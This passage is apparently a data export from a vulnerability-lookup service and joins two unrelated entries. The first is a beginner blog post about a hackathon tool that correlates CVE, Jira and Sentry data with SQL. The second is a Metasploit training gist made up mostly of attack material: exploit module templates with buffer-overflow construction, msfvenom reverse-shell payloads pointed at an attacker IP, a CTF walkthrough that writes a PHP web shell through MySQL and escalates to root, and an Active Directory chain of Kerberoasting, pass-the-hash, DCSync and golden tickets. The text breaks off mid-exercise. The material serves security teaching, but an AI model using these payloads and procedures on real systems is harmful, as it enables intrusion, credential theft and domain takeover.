isn't.** CoralSentinel is a *proof-of-concept* I built\n > for a one-week hackathon (Pirates of the Coral-bean, WeMakeDevs \u00d7 Coral). It went through\n > several rounds of writing a plan, building, testing, and throwing things away. It is **not** a\n > finished product, and I won't pretend it is. It's a demonstration of how far one person can\n > get on a genuinely hard problem when the right tool does the heavy lifting. That tool is\n > **Coral**, and this article is mostly a love letter to it.\n >\n > If you're new to security tooling or to SQL, don't worry \u2014 I'll explain every term as we go.\n\n ---\n\n ## The problem, told as a story\n\n Imagine you're on a team that builds an app. Like almost every app today, yours has some AI\n features, so it pulls in popular Python packages \u2014 little bundles of reusable code written by\n other people. Things like `requests` (for talking to the internet), `pillow` (for handling\n images), and `django` (a web framework).\n\n You didn't write those packages. You just `pip install`-ed them and moved on. **And that's\n where the danger hides.**\n\n Every so often, someone discovers a security hole in one of these packages. When that happens,\n it gets a public ID \u2014 a **CVE** (Common Vulnerabilities and Exposures), which is just a unique\n name for a known bug, like `CVE-2024-1234`. There's a free public database called **OSV** that\n lists all of these.\n\n Now the trouble starts. One morning your build breaks. Your **container registry** (the place\n that stores the packaged-up version of your app, ready to ship) refuses to accept your new\n build because it spotted a CVE. Or your **CI pipeline** (the automated system that tests and\n ships your code) turns red. Someone has to figure out, fast:\n\n > **\"Is this security hole actually hurting our running app right now \u2014 and is anyone already\n > fixing it?\"**\n\n That sounds like a five-minute question. In real life, it's 30 to 60 minutes of clicking\n between five different tools, each of which knows only its own little corner:\n\n - **OSV** \u2014 *What is this CVE? Which package versions are affected?*\n - **GitHub** \u2014 *Has anyone opened a pull request to fix it?* (A \"pull request,\" or PR, is a\n proposed code change.)\n - **Sentry** \u2014 *Is our live app actually throwing errors related to this?* (Sentry is a tool\n that catches and reports crashes in running apps.)\n - **Jira** \u2014 *Is there a ticket for this? Who owns it?* (Jira is where teams track tasks.)\n - **Grafana** \u2014 *Do our infrastructure dashboards show anything weird?*\n\n You become a human copy-paste machine, stitching five tools together in your head. There's\n even a word for this in the database world: you're doing a **JOIN** \u2014 manually matching up\n related information from different sources. Computers are *really* good at JOINs. Humans are\n slow and make mistakes.\n\n So I wondered: what if I could make the computer do the JOIN?\n\n ---\n\n ## The \"aha\": what if every tool were just a table?\n\n If you've ever used a spreadsheet, you already understand a **database table**: rows and\n columns. And **SQL** (Structured Query Language) is just the most common way to ask questions\n of tables. A SQL question \u2014 called a **query** \u2014 reads almost like English:\n\n ```sql\n SELECT name, severity\n FROM vulnerabilities\n WHERE severity = 'CRITICAL'\n ```\n\n That says: *\"Give me the name and severity from the vulnerabilities table, but only the\n critical ones.\"* That's it. That's SQL.\n\n The dream: what if OSV, GitHub, Sentry, Jira, and Grafana were all just **tables** I could\n query with SQL \u2014 even *join together* in a single question?\n\n Here's the catch, and why this is normally hard. Each of those five tools speaks its own\n language over the internet (an **API**, or Application Programming Interface \u2014 the doorway\n other programs use to talk to a service). Each API has:\n\n - its own way of proving who you are (**authentication**),\n - its own way of handing back results a page at a time (**pagination**),\n - its own limits on how often you're allowed to ask (**rate limits**).\n\n Normally, to talk to five APIs, you'd write five mini-programs, handle five logins, five\n paging systems, five sets of limits, and *then* write the code to match the data up. That's a\n solid week of plumbing before you answer a single question. For a one-person hackathon project,\n that's a non-starter.\n\n This is exactly the wall that stops most people. And this is where Coral comes in.\n\n ---\n\n ## Enter Coral: the universal translator\n\n **Coral** is a tool that turns external services into SQL tables. You connect a \"source\" (like\n GitHub or Sentry) once, and from then on you just write SQL. Coral handles the logins, the\n paging, and the rate limits *below deck* \u2014 you never see them.\n\n So those five separate tools? With Coral, they become five tables I can query and **JOIN** in\n one breath. The week of plumbing... evaporates.\n\n Connecting a source is genuinely a one-liner. Here's how CoralSentinel adds the OSV\n vulnerability database:\n\n ```bash\n coral source add --file ./sources/osv/osv.yaml\n ```\n\n And GitHub, Jira, Sentry, and Grafana are \"bundled\" \u2014 Coral already knows how to talk to them,\n so you just add them and provide your credentials.\n\n > **A small bounty side-quest.** OSV wasn't one of Coral's built-in sources, so I wrote a\n > \"source spec\" for it \u2014 a `osv.yaml` file that teaches Coral how to turn the OSV API into SQL\n > tables. That file is reusable by anyone, and it's my little contribution back to the\n > community. You don't need to understand its internals to follow this article; just know that\n > teaching Coral a *new* tool is a config file, not a codebase.\n\n ---\n\n ## The one query that replaces an hour of clicking\n\n Here's the heart of the whole project. This single SQL query asks all three of the most\n important questions at once \u2014 *Is there a known vulnerability? Is anyone tracking it in Jira?\n Is the live app throwing errors about it in Sentry?* \u2014 for the `pillow` image package:\n\n ```sql\n SELECT\n osv.id AS cve, -- the vulnerability's public ID\n osv.summary, -- a human description of it\n osv.severity, -- how bad it is\n j.key AS jira_ticket, -- the Jira ticket, if one exists\n j.status_name AS jira_status, -- e.g. \"In Progress\"\n CASE WHEN j.key IS NULL THEN 'UNTRACKED'\n ELSE COALESCE(j.status_name, 'Tracked') END AS tracking_status,\n COALESCE(se.count, 0) AS error_count, -- how many live errors\n se.level AS error_level\n FROM osv.search_vulnerabilities(\n package => 'pillow',\n ecosystem => 'PyPI'\n ) osv\n LEFT JOIN jira.issues j\n ON j.summary LIKE CONCAT('%', osv.id, '%')\n OR j.summary LIKE CONCAT('%', 'pillow', '%')\n LEFT JOIN sentry.issues se\n ON se.level IN ('fatal', 'error')\n AND CAST(se.last_seen AS TIMESTAMP) >= NOW() - INTERVAL '30' DAY\n AND se.title LIKE CONCAT('%', 'pillow', '%')\n ORDER BY osv.published DESC\n LIMIT 5;\n ```\n\n Don't be intimidated \u2014 let's read it in plain English, top to bottom:\n\n 1. **`SELECT ...`** \u2014 \"Here are the columns I want back.\" (The CVE, its summary, the Jira\n ticket, the error count, and so on.)\n 2. **`FROM osv.search_vulnerabilities(package => 'pillow', ...)`** \u2014 \"Start with all known\n vulnerabilities for the `pillow` package, from PyPI (Python's package store).\"\n 3. **`LEFT JOIN jira.issues ...`** \u2014 \"For each vulnerability, also try to find a matching Jira\n ticket.\"\n 4. **`LEFT JOIN sentry.issues ...`** \u2014 \"And also try to find matching live errors from the last\n 30 days in Sentry.\"\n\n That `LEFT JOIN` is doing the work a human would otherwise do by tabbing between browser\n windows. **Three tools, one question, a couple of seconds.**\n\n ### Two beginner-friendly tricks that make it actually work\n\n When I first tried this, it returned nothing. Here's why \u2014 and the two lessons that made it\n click. These are worth knowing even if you only ever write SQL casually:\n\n **1. Match *loosely*, not exactly.** A Jira ticket titled *\"Upgrade pillow to fix\n CVE-2024-1234\"* will never be *exactly equal* to the string `CVE-2024-1234`. If you demand an\n exact match, you get nothing. So instead of `=`, the query uses `LIKE` with `%` wildcards,\n which means \"contains this somewhere.\" `j.summary LIKE '%pillow%'` means \"any Jira ticket whose\n title contains the word pillow.\" Real-world data is messy; loose matching is how you cope.\n\n **2. Match on *time windows*, not exact timestamps.** A live error and a vulnerability won't\n happen at the exact same millisecond. So rather than demanding equal timestamps, the query\n asks for errors \"in the last 30 days\" (`NOW() - INTERVAL '30' DAY`). Time *ranges*, not exact\n moments.\n\n These two ideas \u2014 **loose text matching** and **time windows** \u2014 are the difference between a\n query that works in a tidy demo and one that works on real, messy data.\n\n ---\n\n ## The moment it all pays off\n\n So you run a scan across a handful of your AI-stack packages, and CoralSentinel sorts every\n vulnerability into one of three buckets. (The colored dots are exactly what the dashboard\n shows.)\n\n - \ud83d\udd34 **Untracked** \u2014 There are CVEs in `requests` and `pillow`, but **no Jira ticket exists for\n them**. Nobody on the team even knows. These slipped through the cracks. These are packages\n in nearly *every* AI app, by the way.\n - \ud83d\udd34 **Actively breaking** \u2014 Here's the one that gives me chills. The `pillow` vulnerability\n isn't just theoretical: it lines up with **12 \"fatal\" errors in Sentry in the same time\n window.** That's not a someday-problem on a backlog \u2014 that's *your image feature crashing for\n real users right now.* And you could **only** see that because OSV (the vulnerability) was\n joined to Sentry (the live crashes). Neither tool knows that on its own.\n - \ud83d\udfe2 **Already handled** \u2014 The `django` vulnerability already has a Jira ticket marked \"In\n Progress.\" Someone's on it. So the tool stays quiet about it \u2014 no nagging, no \"alert\n fatigue.\"\n\n That middle one \u2014 connecting *\"there's a known bug\"* to *\"and it's crashing the app right\n now\"* \u2014 is the insight that's basically impossible without cross-tool SQL. That's the whole\n pitch in one screenshot.\n\n ---\n\n ## From \"here's the problem\" to \"here's the fix\" \u2014 safely\n\n Spotting the problem is only half the job. CoralSentinel then acts like a careful assistant. I\n call the overall flow **DETECT \u2192 RECOMMEND \u2192 ACT**:\n\n | Step | What happens | In plain words |\n |---|---|---|\n | **DETECT** | Cross-source SQL reads all five tools | \"Here's what I found.\" |\n | **RECOMMEND** | The assistant suggests a to-do list | \"Here's what I'd do about it.\" |\n | **ACT** | It does the tasks \u2014 *only after you approve* | \"Want me to? Click yes.\" |\n\n For our example, the RECOMMEND step produces a tidy, ordered list like:\n\n 1. Open a Jira ticket for the untracked `requests` vulnerability.\n 2. Open a Jira ticket for the `pillow` one \u2014 **flagged urgent** (it's actively crashing things).\n 3. Draft a GitHub pull request to upgrade `pillow` from version 9.0.0 to 10.3.0.\n 4. Add a note (an \"annotation\") to the Grafana dashboard timeline.\n 5. Write up a short security report.\n\n ### The safety rule I'm most proud of\n\n Here's the part that matters if you're nervous about letting software touch your systems:\n\n > **Coral can only ever *read*. It physically cannot change anything.**\n\n Reading data and changing data are kept in completely separate parts of the program. Nothing\n gets written to Jira, GitHub, or Grafana until **a human clicks \"Approve.\"** No runaway robot\n making changes on its own. You stay in control; the tool just removes the busywork. The result:\n about 30 minutes of manual detective work collapses into roughly 30 seconds \u2014 without handing\n over the keys.\n\n ---\n\n ## \"Wait, where's the AI?\"\n\n Good \u2014 you noticed I've barely mentioned AI, even though this is an AI-security tool. That's on\n purpose. The clever part isn't the AI; it's the SQL. But there *is* a friendly AI layer on top,\n and it does two nice things:\n\n **1. It writes the SQL for you.** You can type a plain-English question like *\"Which packages\n have untracked critical CVEs?\"* and the AI (an **LLM**, or Large Language Model \u2014 the same kind\n of tech behind chatbots) turns it into a proper Coral SQL query, runs it, and explains the\n results. Importantly, **it then shows you the exact SQL it wrote.** No mystery, no black box \u2014\n you can read precisely what it asked the database.\n\n **2. You can bring your own AI.** I didn't lock the project to one AI company. It works with\n four interchangeable options, so you can use whatever you already have access to:\n\n | AI provider | How you'd use it |\n |---|---|\n | **Cursor** | Use your existing Cursor subscription via a small local helper \u2014 no extra key needed |\n | **EURI** | A simple API key |\n | **Grok** (from xAI) | A simple API key |\n | **Anthropic** (Claude) | A simple API key |\n\n You set one setting (`LLM_PROVIDER`), or just leave it on `auto` and it picks the first one\n you've configured. Under the hood it's one tidy function that all four plug into.\n\n And there's a guardrail baked into the AI's instructions: it's **only ever allowed to write\n read-only queries.** The code literally rejects any AI-generated query that tries to change\n data \u2014 it checks for forbidden words like `INSERT`, `UPDATE`, and `DELETE` and refuses to run\n them. Belt *and* suspenders.\n\n ---\n\n ## A few grown-up touches\n\n Because I wanted this to feel like a real tool and not a toy script, I added a couple of things\n beginners might find interesting:\n\n - **A login screen with organizations.** When you sign up, you create an \"organization\" (think:\n your team's workspace) and become its first member. Passwords are stored scrambled (a process\n called **hashing**, so even I can't read them), and you stay logged in via a secure browser\n cookie. All built with Python's standard toolkit \u2014 no heavy extra libraries.\n - **A memory for recent questions (caching).** If the tool just asked Coral something, it\n remembers the answer for a short while instead of pestering the five APIs again. So flipping\n between tabs feels instant. (In the code, this is a small dictionary that stores results with\n a timestamp \u2014 simple, but effective.)\n - **Two ways to use it.** There's a slick dark-themed web dashboard *and* a command-line version\n for terminal fans. Both run the exact same SQL underneath.\n\n Here's the command-line version, start to finish:\n\n ```bash\n # 1. DETECT \u2014 scan some packages for trouble\n coralsentinel scan --packages django,requests,pillow,celery\n\n # 2. RECOMMEND \u2014 see the suggested to-do list\n coralsentinel recommend --packages django,requests,pillow,celery\n\n # 3. ACT \u2014 approve everything (only now does anything get written)\n coralsentinel act --approve-all\n ```\n\n ---\n\n ## Try it yourself\n\n If you want to poke at it, here's the short version:\n\n ```bash\n git clone coral-sentinel\n cd coral-sentinel\n pip install -e .\n\n # Teach Coral about the OSV vulnerability database (it's a public API, no login needed)\n coral source add --file ./sources/osv/osv.yaml\n\n # Start the web dashboard\n uvicorn devsecops_coral.api:app --reload --port 8000\n cd frontend && npm install && npm run dev # then open http://localhost:5173\n ```\n\n > Repo: `` \u00b7 Live demo: ``\n\n ---\n\n ## What I actually learned\n\n If you take one thing from this article, let it be this:\n\n Teams building AI products don't really have a vulnerability **detection** problem anymore \u2014\n scanners and registries are good at shouting \"this package is risky!\" What they have is a\n **triage** problem: *out of all these warnings, which one is actually on fire right now, and\n who owns putting it out?*\n\n Answering that means connecting tools that were never designed to talk to each other. And the\n reason I \u2014 one person, in a hackathon week \u2014 could build a five-tool correlation engine, an\n approval-gated assistant, a login system, *and* support for four different AI providers, is\n **not** that I'm especially fast. It's that Coral deleted the part that's normally the hard\n part. Once your messy, far-flung tools all become tidy SQL tables, the work stops being\n *plumbing* and starts being the *interesting question*.\n\n That's the real lesson, and it's a beginner-friendly one: **the right tool doesn't just make\n hard work easier \u2014 it makes a different kind of work possible.** CoralSentinel is an 80%\n proof-of-concept of that idea. It's rough in places, it's unfinished on purpose, and I think\n it's all the more convincing for it.\n\n Thanks for reading. If you're just getting into security tooling or SQL, I hope this made the\n whole thing feel a little less mysterious. \ud83e\udeb8\n\n ---\n\n *Built for Pirates of the Coral-bean (WeMakeDevs \u00d7 Coral), Track 1 \u2014 Enterprise Agent.*\n\n \n", "creation_timestamp": "2026-05-30T07:39:07.000000Z"}, {"uuid": "a264d72b-0bc2-4dc5-b3df-151451e88804", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/riskiidice/d7687b881b245df5bc96147fc1e6b01c", "content": "# Module 6: Real-World Exploitation & CTF Scenarios\n\n---\n\n## Lesson 26: Exploit Development with MSF (CVE-Focused)\n\n### Learning Objectives\n- Understand the MSF exploit module structure as a foundation for exploit development\n- Use `searchsploit` to find public exploits and convert them to MSF format\n- Analyze CVE details and map them to MSF modules\n- Write a basic MSF exploit module from scratch\n- Understand egghunters, SEH overwrites, and ROP chains\n\n---\n\n### Theory/Explanation\n\n#### Anatomy of an MSF Exploit Module\n\nEvery MSF exploit module is a Ruby class inheriting from an MSF exploit mixin:\n\n```ruby\n# modules/exploits/windows/smb/custom_cve.rb\nrequire 'msf/core'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking # or GreatRanking, ExcellentRanking, etc.\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Custom CVE-2024-XXXX SMB Exploit',\n 'Description' => %q{\n This module exploits CVE-XXXX-XXXX in the SMB protocol.\n A remote code execution vulnerability exists due to\n improper handling of specially crafted SMB packets.\n },\n 'Author' => ['Your Name '],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2024-XXXX'],\n ['URL', 'https://example.com/advisory'],\n ['EDB', '12345']\n ],\n 'Platform' => ['win'],\n 'Arch' => [ARCH_X64],\n 'Targets' =>\n [\n ['Windows Server 2019', {\n 'Payload' => 'windows/x64/meterpreter/reverse_tcp',\n 'RPORT' => 445\n }]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2024-01-15'\n ))\n\n register_options([\n Opt::RHOST(),\n Opt::RPORT(445),\n OptString.new('NAME', [true, 'SMB share name', 'C$'])\n ])\n end\n\n def exploit\n print_status(\"Connecting to target...\")\n connect\n print_status(\"Sending malicious payload...\")\n sock.put(payload.encoded)\n handler\n ensure\n disconnect\n end\nend\n```\n\n#### Exploit Ranking System\n\nMSF assigns ranks to modules based on reliability:\n\n| Rank | Meaning |\n|------|---------|\n| `ManualRanking` | Don't use automatically |\n| `LowRanking` | Unreliable, may crash |\n| `AverageRanking` | Normal, may crash sometimes |\n| `NormalRanking` | Standard exploit |\n| `GoodRanking` | Reliable, works consistently |\n| `GreatRanking` | Very reliable, has auto-targeting |\n| `ExcellentRanking` | Best, won't crash, auto-detects |\n\n#### Using searchsploit\n\n```bash\n# Search for exploits\nsearchsploit smb 8.1\nsearchsploit -t windows smb ms17\nsearchsploit CVE-2024-1234\n\n# Show full path\nsearchsploit -p 50644\n\n# Copy exploit to working directory\nsearchsploit -m 50644 # mirror (copy)\n\n# Update exploit database\nsearchsploit -u\n```\n\n#### Writing a Simple Buffer Overflow MSF Module\n\n```ruby\n# modules/exploits/windows/custom/bof.rb\nrequire 'msf/core'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Custom Buffer Overflow',\n 'Description' => %q{\n Stack-based buffer overflow in vulnerable service.\n Sending 2000 bytes overwrites EIP.\n },\n 'Author' => ['Attacker'],\n 'References' => [['EDB', '12345']],\n 'Platform' => ['win'],\n 'Arch' => [ARCH_X86],\n 'Targets' =>\n [\n ['Windows XP SP3', {\n 'Payload' => 'windows/meterpreter/reverse_tcp',\n 'Offset' => 2000,\n 'Ret' => 0x41414141 # JMP ESP address\n }]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2024-01-01'\n ))\n\n register_options([\n Opt::RHOST(),\n Opt::RPORT(9999)\n ])\n end\n\n def exploit\n connect\n\n # Build overflow buffer\n buffer = rand_text(target['Offset'])\n buffer += [target['Ret']].pack('V') # overwrite EIP with JMP ESP\n buffer += make_nops(16)\n buffer += payload.encoded\n\n print_status(\"Sending #{buffer.length} byte buffer...\")\n sock.put(buffer)\n\n handler\n disconnect\n end\nend\n```\n\n#### Egghunter Shellcode\n\nWhen you have limited space for shellcode, use an egghunter \u2014 a small (~60 byte) stub that searches memory for your full payload (marked with a tag):\n\n```bash\n# Generate egghunter shellcode\nmsfvenom -p linux/x64/egghunter LHOST=10.0.0.5 LPORT=4444 -f c\n\n# Use in your exploit: first stage is egghunter (small)\n# Second stage is your full payload tagged with \"w00tw00t\"\nmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -b '\\x00' -f c\n# Tag the payload: prepend \"w00tw00t\" to it\n```\n\n---\n\n### Exercise 26.1\n\n**Task**:\n\n1. Use `searchsploit` to find exploits related to `samba` and ` EternalBlue`\n2. Identify a specific EDB-ID exploit and mirror it to `/tmp/exploits/`\n3. Analyze the mirrored exploit to identify: target platform, required options, and payload type\n4. Create a minimal MSF module skeleton for a fictional CVE in `/tmp/exploits/custom_module.rb`\n5. Show how to load the custom module in msfconsole\n\n```bash\n# TODO: Execute all steps\n```\n\n\n\nSolution\n\n```bash\n# 1. Search for Samba exploits\nsearchsploit samba | head -20\n# Results:\n# EDB-ID Title\n# 42030 Samba 3.5.0 - Lock Denial of Service\n# 33598 Samba 3.6.4 - Pool Memory Exhaustion\n# 42015 Samba 4.6.4 Remote Code Execution\n\nsearchsploit EternalBlue\n# EDB-ID: 42030 (depends on version)\n\n# 2. Mirror the exploit\nmkdir -p /tmp/exploits\nsearchsploit -m 42015\n# Copies: /usr/share/exploitdb/exploits/linux/remote/42015.rb -> /tmp/exploits/\n\n# 3. Analyze the exploit\nhead -100 /tmp/exploits/42015.rb\n# Shows:\n# - Target: Samba 4.6.4\n# - Platform: linux\n# - Arch: x86/x64\n# - Payload: 'linux/x86/meterpreter/reverse_tcp' or similar\n# - Required: RHOST, RPORT (445), SMB versions\n\n# 4. Create custom module skeleton\ncat > /tmp/exploits/custom_module.rb << 'EOF'\nrequire 'msf/core'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Custom Application CVE-2024-0001 RCE',\n 'Description' => %q{\n This module exploits CVE-2024-0001 in CustomApp v1.0.\n A remote code execution vulnerability exists due to\n improper input validation in the authentication handler.\n },\n 'Author' => ['Attacker '],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2024-0001'],\n ['URL', 'https://example.com/advisory']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X64],\n 'Targets' =>\n [\n ['CustomApp 1.0', {\n 'Payload' => 'linux/x64/meterpreter/reverse_tcp',\n 'RPORT' => 8080\n }]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2024-01-15'\n ))\n\n register_options([\n Opt::RHOST(),\n Opt::RPORT(8080)\n ])\n end\n\n def exploit\n connect\n print_status(\"Sending exploit...\")\n sock.put(payload.encoded)\n handler\n ensure\n disconnect\n end\nend\nEOF\n\n# 5. Load custom module in msfconsole\n# Option A: Copy to MSF module directory\ncp /tmp/exploits/custom_module.rb /usr/share/metasploit-framework/modules/exploits/custom/\nmsfconsole -q\nmsf6 > use exploit/custom/custom_module\n\n# Option B: Use loadpath\nmsfconsole -q\nmsf6 > loadpath /tmp/exploits\nmsf6 > use exploit/custom/custom_module\n```\n\n\n\n---\n\n## Lesson 27: CTF Walkthrough \u2014 Boot2Root with MSF\n\n### Learning Objectives\n- Apply MSF systematically in a CTF boot2root challenge\n- Combine port scanning, vulnerability identification, and exploitation\n- Use Meterpreter for privilege escalation\n- Capture the flags (flag.txt) at each stage\n- Document methodology for writeups\n\n---\n\n### Theory/Explanation\n\n#### CTF Methodology with MSF\n\n```\nPhase 1: Reconnaissance\n - db_nmap -sV -sC -oA scan\n - Import into MSF database\n - Analyze services\n\nPhase 2: Vulnerability Discovery\n - searchsploit on discovered services\n - Use MSF auxiliary scanners\n - Manual inspection\n\nPhase 3: Exploitation\n - Select and configure MSF exploit\n - Generate appropriate payload\n - Establish session\n\nPhase 4: Post-Exploitation\n - Enumerate filesystem\n - Find user.txt (user flag)\n - Enumerate for privilege escalation vector\n\nPhase 5: Privilege Escalation\n - Exploit kernel/system misconfiguration\n - Get root.txt (root flag)\n```\n\n#### Example CTF Scenario: \"VulnNet\"\n\n```bash\n# Phase 1: Network scan\nmsfconsole -q\nmsf6 > db_nmap -sV -sC -p- 192.168.56.100 -oA /tmp/vulnnet_scan\n\n# Import results\nmsf6 > hosts\nHost OS Purpose\n192.168.56.100 Linux Web server, SSH\n\nmsf6 > services\nPORT STATE SERVICE VERSION\n22 open ssh OpenSSH 7.4\n80 open http Apache 2.4.6\n3306 open mysql MySQL 5.5.60\n\n# Phase 2: Web enumeration\nmsf6 > use auxiliary/scanner/http/dir_scanner\nmsf6 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.56.100\nmsf6 auxiliary(scanner/http/dir_scanner) > run\n# Found: /admin (redirects to login)\n# Found: /phpmyadmin (database admin)\n\n# Phase 3: Exploitation\n# Try default MySQL credentials\nmsf6 > use auxiliary/scanner/mysql/mysql_login\nmsf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.56.100\nmsf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root\nmsf6 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt\nmsf6 auxiliary(scanner/mysql/mysql_login) > run\n# Result: root:root123\n\n# Phase 4: Get user flag via web shell\n# Since we have MySQL access, try into/outfile to write web shell\nmsf6 > use auxiliary/admin/mysql/mysql_sql\nmsf6 auxiliary(admin/mysql/mysql_sql) > set RHOSTS 192.168.56.100\nmsf6 auxiliary(admin/mysql/mysql_sql) > set SQL \"SELECT '' INTO OUTFILE '/var/www/html/shell.php'\"\nmsf6 auxiliary(admin/mysql/mysql_sql) > run\n\n# Now access web shell\ncurl http://192.168.56.100/shell.php?cmd=whoami\n# www-data\n\n# Get meterpreter by generating a PHP payload\nmsfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f raw > /tmp/shell.php\n# Upload via the web shell and access it\n\n# Phase 5: Privilege escalation\nmeterpreter > shell\n$ python3 -c 'import os; os.system(\"/bin/bash\")'\n$ cd /home\n$ ls\nvictim\n$ cat /home/victim/user.txt\nFLAG{user_flag_here}\n\n# Find privilege escalation vector\n$ sudo -l\nUser www-data may run the following commands:\n (ALL) NOPASSWD: /usr/bin/python3\n\n$ sudo python3 -c 'import os; os.system(\"/bin/bash\")'\n# root shell\n# cat /root/root.txt\nFLAG{root_flag_here}\n```\n\n---\n\n### Exercise 27.1\n\n**Task**: Walk through a complete CTF scenario (use your own lab VM or practice box):\n\n1. Run a comprehensive nmap scan via MSF db_nmap\n2. Import the scan results and list all hosts/services\n3. Use `searchsploit` on discovered services\n4. Exploit a vulnerability to get a shell\n5. Get the user flag\n6. Enumerate for privilege escalation\n7. Escalate to root and get the root flag\n8. Export the session log for a writeup\n\n```bash\n# TODO: Execute all steps on your practice VM\n```\n\n\n\nSolution\n\n```bash\n# Setup: Assuming target IP is 192.168.56.101\n# (This exercise is meant to be done on your own lab VM)\n\n# 1. Comprehensive scan\nmsfconsole -q\nmsf6 > db_nmap -sV -sC -A -p- -oA /tmp/ctf_scan 192.168.56.101\n\n# 2. Import and list\nmsf6 > hosts\nmsf6 > services\n# Results show:\n# PORT STATE SERVICE VERSION\n# 21 open ftp vsFTPd 3.0.3\n# 22 open ssh OpenSSH 7.4 (protocol 2.0)\n# 80 open http Apache 2.4.6 (PHP 7.0.33)\n# 3306 open mysql MariaDB 5.5.60\n\n# 3. Searchsploit\nsearchsploit vsftpd 3.0.3\n# EDB: 49759 - vsftpd 3.0.3 - Denial of Service (doesn't give shell)\n\nsearchsploit OpenSSH 7.4\n# No critical RCE for 7.4\n\nsearchsploit Apache 2.4.6\n# Find: Apache 2.4.6 - PHP 7.0.33 has exploit (CVE-2018-xxxx for example)\n\n# 4. Exploit\nmsf6 > use exploit/unix/webapp/phpmyadmin_lfi_rce\n# (Use whatever exploit matches your target)\n\n# 5. Get user flag\nmeterpreter > shell\n$ find / -name \"user.txt\" 2>/dev/null\n/home/ubuntu/user.txt\n$ cat /home/ubuntu/user.txt\nFLAG{ctf_user_flag_abc123}\n\n# 6. Enumerate for privesc\n$ sudo -l\n(ubuntu) NOPASSWD: /bin/bash\n\n# Actually check for privesc via enumeration script\nmeterpreter > upload /tmp/linpeas.sh /tmp/linpeas.sh\nmeterpreter > shell\n$ chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh\n\n# 7. Escalate\n$ sudo /bin/bash\n# root shell\n$ cat /root/root.txt\nFLAG{ctf_root_flag_xyz789}\n\n# 8. Export session log\nmsf6 > makerc /tmp/ctf_session.rc\n# Now you have a script to replay the entire session\n```\n\n\n\n---\n\n## Lesson 28: Active Directory Attack Chain\n\n### Learning Objectives\n- Build a complete AD attack chain using MSF modules\n- Perform recon: enum users, groups, trusts, shares\n- Exploit Printer Bug for privilege escalation\n- Use SMB relay attacks\n- Understand the relationship between AD attacks and MSF\n\n---\n\n### Theory/Explanation\n\n#### AD Attack Chain Overview\n\n```\nInitial Access \u2192 Recon \u2192 Privilege Escalation \u2192 Persistence \u2192 Lateral Movement \u2192 Domain Dominance\n | | | | | |\n Phishing BloodHound Kerberoast Golden WMI DCSync\n enum ~SPN accounts Ticket PsExec krbtgt\n LDAP enum Registry WinRM Domain\n persistence SMB relay controllers\n```\n\n#### Phase 1: Initial Recon\n\n```bash\n# Use MSF's LDAP module for AD enumeration\nmsf6 > use auxiliary/admin/ldap/query\nset RHOSTS DC01.corp.local\nset BASE_DN \"DC=corp,DC=local\"\nset USERNAME CORP\\\\lowprivuser\nset PASSWORD Password123\nset FILTER \"(objectClass=user)\"\nrun\n\n# Use PowerView from meterpreter (if you have a session on domain-joined host)\nmeterpreter > load powershell\nmeterpreter > powershell_import /usr/share/powersploit/Recon/PowerView.ps1\nmeterpreter > powershell_execute \"Get-NetDomain\"\nmeterpreter > powershell_execute \"Get-NetDomainControllers\"\nmeterpreter > powershell_execute \"Get-NetUser | Select-Object -First 30\"\n```\n\n#### Phase 2: Kerberoasting\n\n```bash\n# Find users with SPN (service accounts)\nmeterpreter > powershell_execute \"Get-NetUser -SPN | Select-Object samaccountname,serviceprincipalname\"\n\n# Request TGS for each SPN\n# Use from meterpreter:\nmeterpreter > run post/windows/gather/credentials/kerberos_tickets\n\n# Or use from msfconsole:\nmsf6 > use auxiliary/admin/kerberos/kerberos_ticket_export\nset SESSION 1\nrun\n\n# Crack the TGS offline\nhashcat -m 13100 -a 0 tickets.kirbi /usr/share/wordlists/rockyou.txt\n```\n\n#### Phase 3: SMB Relay Attack\n\n```bash\n# Start SMB relay module\nmsf6 > use auxiliary/server/capture/smb\nset SRVHOST 10.0.0.5\nset SRVPORT 445\nrun -j\n\n# Or use Responder (external tool) to poison LLMNR/NBT-NS\n# This forces targets to authenticate to your relay\n```\n\n#### Phase 4: Pass-the-Hash (from LDAP)\n\n```bash\n# With domain admin hash:\nmsf6 > use exploit/windows/smb/psexec\nset RHOSTS 192.168.1.10\nset SMBUser Administrator\nset SMBPass \nset PAYLOAD windows/x64/meterpreter/reverse_tcp\nset LHOST 10.0.0.5\nexploit\n\n# Lateral movement via WMI\nmsf6 > use exploit/windows/smb/wmiexec\nset RHOSTS 192.168.1.20\nset SMBUser Administrator\nset SMBPass \nexploit\n```\n\n#### Phase 5: Domain Dominance with DCSync\n\n```bash\n# Once you have Domain Admin access:\nmeterpreter > load kiwi\nmeterpreter > dcsync_ntlm CORP.LOCAL\\\\krbtgt\n\n# Create golden ticket\nmeterpreter > golden_ticket_create -d CORP.LOCAL -k -s -u Administrator\n\n# Now you have full domain persistence\n```\n\n---\n\n### Exercise 28.1\n\n**Task**: Build an AD attack chain on a practice domain (simulated):\n\n1. Enumerate domain users via LDAP module\n2. Find SPN accounts (Kerberoastable targets)\n3. Extract password hashes via hashdump\n4. Use Pass-the-Hash to lateral move to another host\n5. Get Domain Admin via DCSync\n6. Create a golden 